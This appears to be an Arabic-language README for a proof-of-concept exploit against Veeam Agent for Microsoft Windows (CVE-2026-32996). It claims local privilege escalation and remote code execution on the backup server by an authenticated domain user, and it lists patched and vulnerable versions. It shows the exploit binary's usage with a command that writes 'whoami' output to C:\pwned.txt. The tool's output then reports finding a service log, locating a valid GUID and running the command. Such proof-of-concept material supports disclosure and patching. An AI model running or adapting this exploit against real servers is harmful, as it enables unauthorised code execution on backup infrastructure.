
ثغرة أمنية في Veeam Agent for Microsoft Windows تسمح بتصعيد الصلاحيات المحلية.
تنفيذ تعليمات برمجية عن بُعد (RCE) على خادم النسخ الاحتياطي بواسطة مستخدم نطاق مُصادَق عليه في Veeam.
راجع منشور المدونة للحصول على التفاصيل التقنية.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| الإصدار | الحالة |
|---|---|
| 13.0.3.1220 | مُصحَّح بالكامل. |
| 13.0.2.1102 والإصدارات الأقدم | عرضة للثغرة. |